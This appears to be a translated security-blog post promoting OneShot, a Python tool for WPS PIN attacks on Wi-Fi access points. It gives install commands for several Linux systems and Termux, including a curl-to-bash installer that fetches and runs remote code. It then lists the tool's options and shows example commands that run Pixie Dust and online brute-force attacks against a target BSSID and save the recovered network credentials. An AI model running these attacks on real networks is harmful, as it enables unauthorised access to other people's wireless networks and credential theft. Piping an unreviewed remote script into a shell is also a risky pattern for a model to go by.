OneShot: WPS Pin attacks without monitoring function!

OneShot is an open source python script that executes Pixie Dust attacks without having to first change the interface to monitoring mode.

hack

Characteristics

System requirements

Installation

Debian / Ubuntu

sudo apt install -y python3 wpasupplicant iw wget

Pixiewps installation

Ubuntu 18.04 and later or Debian 10 and later

sudo apt install -y pixiewps

Other editions

sudo apt install -y build-essential unzip
wget https://github.com/wiire-a/pixiewps/archive/master.zip && unzip master.zip
cd pixiewps*/
make
sudo make install

Download OneShot

cd ~
wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py

Optional: download a list of vulnerable devices in pixie dust to highlight the scan results:

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt

Arch Linux

Installation requirements

sudo pacman -S wpa_supplicant pixiewps wget python

Download OneShot

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py

Optional: download a list of vulnerable devices in pixie dust to highlight the scan results:

wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt

Alpine Linux

  Smap: nmap scanner via Shodan

It can also be used to run on Android devices that use Linux Deploy

Installation requirements
Add the test repository:

sudo sh -c 'echo "http://dl-cdn.alpinelinux.org/alpine/edge/testing/" >> /etc/apk/repositories'
sudo apk add python3 wpa_supplicant pixiewps iw

Download OneShot

sudo wget https://raw.githubusercontent.com/drygdryg/OneShot/master/oneshot.py

Optional: download a list of vulnerable devices in pixie dust to highlight the scan results:

sudo wget https://raw.githubusercontent.com/drygdryg/OneShot/master/vulnwsc.txt

Termux

Note that root access is required.

Use installer

curl -sSf https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh | bash

Manually

Installation requirements

pkg install -y root-repo

pkg install -y git tsu python wpa-supplicant pixiewps iw

Download OneShot

git clone --depth 1 https://github.com/drygdryg/OneShot OneShot

Implementation

sudo python OneShot/oneshot.py -i wlan0 --iface-down -K

Use

oneshot.py <arguments>
 Required arguments:
     -i, --interface=<wlan0>  : Name of the interface to use

 Optional arguments:
     -b, --bssid=<mac>        : BSSID of the target AP
     -p, --pin=<wps pin>      : Use the specified pin (arbitrary string or 4/8 digit pin)
     -K, --pixie-dust         : Run Pixie Dust attack
     -B, --bruteforce         : Run online bruteforce attack
     --push-button-connect    : Run WPS push button connection

 Advanced arguments:
     -d, --delay=<n>          : Set the delay between pin attempts [0]
     -w, --write              : Write AP credentials to the file on success
     -F, --pixie-force        : Run Pixiewps with --force option (bruteforce full range)
     -X, --show-pixie-cmd     : Alway print Pixiewps command
     --vuln-list=<filename>   : Use custom file with vulnerable devices list ['vulnwsc.txt']
     --iface-down             : Down network interface when the work is finished
     -l, --loop               : Run in a loop
     -v, --verbose            : Verbose output

Start the Pixie Dust attack on a specified BSSID:

sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K

Show available networks and run a Pixie Dust attack on a specified network:

sudo python3 oneshot.py -i wlan0 -K

 WPS bruteforce attack with the specified first half of the PIN:

sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234

WPS connection mode:

Download the program from here.

Registration in iGuRu.gr via email

Your email for sending each new post

Follow us on Google News iGuRu.gr at Google news

Leave a reply

Your email address Will not be published.

1 + 4 =  

Previous Story

Security gap in Rarible NFT Marketplace with more than 2 million monthly users

Next Story

Chrome 100.0.4896.127 update immediately (0day)